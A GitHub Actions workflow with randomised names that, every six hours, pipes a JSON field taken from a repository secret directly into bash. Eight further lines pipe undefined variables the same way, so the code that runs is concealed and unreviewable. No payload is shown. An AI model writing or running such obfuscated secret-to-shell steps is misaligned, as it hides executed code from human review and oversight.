name: xiangyuhuanliu

on:
  workflow_dispatch:
  schedule:
    - cron: '53 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xiangyuhuanliu
        env:
          gvpln31: ${{ secrets.gvpln31 }}
        run: |
          echo $gvpln31 | jq -r .aaw86133 | /bin/bash
          echo $sd734 | jq -r .pp464 | /bin/bash
          echo $ylw66 | jq -r .k6 | /bin/bash
          echo $l884 | jq -r .kjd501 | /bin/bash
          echo $bjyts81813 | jq -r .gaceh00 | /bin/bash
          echo $hky23 | jq -r .dmys3028 | /bin/bash
          echo $euj90 | jq -r .eu6993 | /bin/bash
          echo $q7 | jq -r .gakx6 | /bin/bash
          echo $a3 | jq -r .qssjz1 | /bin/bash

